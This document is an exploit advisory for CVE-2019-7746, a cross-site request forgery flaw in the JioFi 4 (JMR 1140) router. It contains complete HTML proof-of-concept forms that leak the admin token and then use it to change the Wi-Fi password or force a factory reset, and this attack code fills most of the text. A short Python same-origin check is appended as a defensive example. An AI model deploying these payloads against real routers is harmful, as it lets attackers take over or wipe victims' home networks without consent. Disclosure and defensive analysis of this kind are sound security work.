Jiofi 4 (JMR 1140) Admin Token Disclosure Cross Site Request Forgery

Credit: Ronnie T Baby
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352

CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

# Exploit Title: Jiofi 4 (JMR 1140) CSRF To Leak Admin Tokens to change wifi Password or Factory Reset Router
# Date: 12.02.2019
# Exploit Author: Ronnie T Baby
# Contact:
# Vendor Homepage:
# Hardware Link:
# Category: Hardware (Wifi Router)
# Version: JMR-1140 Firmware v. Amtel_JMR1140_R12.07
# Tested on: Ubuntu 18.04
# CVE: CVE-2019-7746

Description:
JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices allow remote attackers to obtain an admin token by making a /cgi-bin/qcmap_auth type=getuser request and then reading the token field. This token value can then be used to change the Wi-Fi password or perform a factory reset.

POC:
The exploit requires two CSRF requests to be sent to the victim (logged in to the web interface) connected to the JioFi router.

1. First get the admin tokens

<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://jiofi.local.html/cgi-bin/qcmap_auth" method="POST">
      <input type="hidden" name="type" value="getuser" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Example response:

{"super_user_id":"administrator", "oper_user_id":"operator", "end_user_id":"admin", "token":"leakedtokens"}

2. Then use the leaked token (Choice A or B)

Choice A) Change the Wi-Fi password of the JioFi 4 (JMR 1140) router to the attacker's choice.

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST">
      <input type="hidden" name="Page" value="SetWiFi&#95;Setting" />
      <input type="hidden" name="Mask" value="0" />
      <input type="hidden" name="result" value="0" />
      <input type="hidden" name="ssid" value="JioFi4&#95;08FE5F" />
      <input type="hidden" name="mode&#95;802&#95;11" value="11bgn" />
      <input type="hidden" name="tx&#95;power" value="HIGH" />
      <input type="hidden" name="wmm" value="Enable" />
      <input type="hidden" name="wps&#95;enable" value="PushButton" />
      <input type="hidden" name="wifi&#95;security" value="WPA2PSK" />
      <input type="hidden" name="wpa&#95;encryption&#95;type" value="AES" />
      <input type="hidden" name="wpa&#95;security&#95;key" value="Iamhacked" />
      <input type="hidden" name="wep&#95;security&#95;key&#95;1" value="0" />
      <input type="hidden" name="wep&#95;security&#95;key&#95;2" value="0" />
      <input type="hidden" name="wep&#95;security&#95;key&#95;3" value="0" />
      <input type="hidden" name="wep&#95;security&#95;key&#95;4" value="0" />
      <input type="hidden" name="wep&#95;current&#95;default&#95;key" value="0" />
      <input type="hidden" name="channel&#95;mode" value="automatic" />
      <input type="hidden" name="channel&#95;selection" value="11" />
      <input type="hidden" name="sleep&#95;mode" value="Enable" />
      <input type="hidden" name="sleep&#95;mode&#95;timer" value="30" />
      <input type="hidden" name="ssid&#95;broadcast" value="Enable" />
      <input type="hidden" name="enable&#95;wifi" value="Enable" />
      <input type="hidden" name="token" value="leakedtokens" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Wi-Fi password changed to Iamhacked.

Choice B) Perform a remote factory reset.

<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST">
      <input type="hidden" name="type" value="FRST&#95;REAL" />
      <input type="hidden" name="token" value="leakedtokens" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

The router reboots to default settings.

Note- I believe this to work in all other Jio routers, viz. Jio JMR 540, JioFi M2, as all share a similar web interface. I have not confirmed this.
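As an added example (not the advisory's or the vendor's code): the same-origin check these CGI endpoints lack, run over request shapes constructed from the three PoC forms above. The host jiofi.local.html is from the PoC; the attacker origin and the Request class are assumptions for illustration.

```python
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit

# Only the router's own web UI (host from the PoC) may submit forms to these endpoints.
ROUTER_HOSTS = {"jiofi.local.html"}
PROTECTED_PATHS = {"/cgi-bin/qcmap_auth", "/cgi-bin/qcmap_web_cgi"}

@dataclass
class Request:
    method: str
    path: str
    headers: Dict[str, str] = field(default_factory=dict)
    form: Dict[str, str] = field(default_factory=dict)

def request_site(req: Request) -> Optional[str]:
    """Host of the page that sent the request: Origin first, then Referer."""
    origin = req.headers.get("Origin")
    if origin and origin != "null":  # "null" is an opaque origin; treat as absent
        return urlsplit(origin).hostname
    referer = req.headers.get("Referer")
    return urlsplit(referer).hostname if referer else None

def should_reject(req: Request) -> Tuple[bool, str]:
    """Same-origin check the advisory's endpoints lack. A browser always attaches
    Origin (or Referer) to a cross-site form POST, so a forged submission is
    refused before the token is even read, leaked or not."""
    if req.method.upper() != "POST" or req.path not in PROTECTED_PATHS:
        return False, "not a protected state-changing request"
    site = request_site(req)
    if site is None:
        return True, "missing Origin/Referer"
    if site not in ROUTER_HOSTS:
        return True, f"cross-site origin {site!r}"
    return False, "same-origin"

# Constructed samples shaped like the PoC forms above; the attacker host is invented.
LEAK_TOKEN = Request("POST", "/cgi-bin/qcmap_auth",
                     {"Origin": "http://evil-page.example"}, {"type": "getuser"})
CHANGE_WIFI = Request("POST", "/cgi-bin/qcmap_web_cgi",
                      {"Referer": "http://evil-page.example/poc.html"},
                      {"Page": "SetWiFi_Setting", "wpa_security_key": "Iamhacked",
                       "token": "leakedtokens"})
FACTORY_RESET = Request("POST", "/cgi-bin/qcmap_web_cgi", {"Origin": "null"},
                        {"type": "FRST_REAL", "token": "leakedtokens"})
LEGIT = Request("POST", "/cgi-bin/qcmap_web_cgi",
                {"Origin": "http://jiofi.local.html"},
                {"Page": "SetWiFi_Setting", "token": "leakedtokens"})
```

All three forged submissions are refused on origin alone, while the same POST from the router's own UI passes; a SameSite=Strict session cookie on the router would block the same requests from the browser side.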

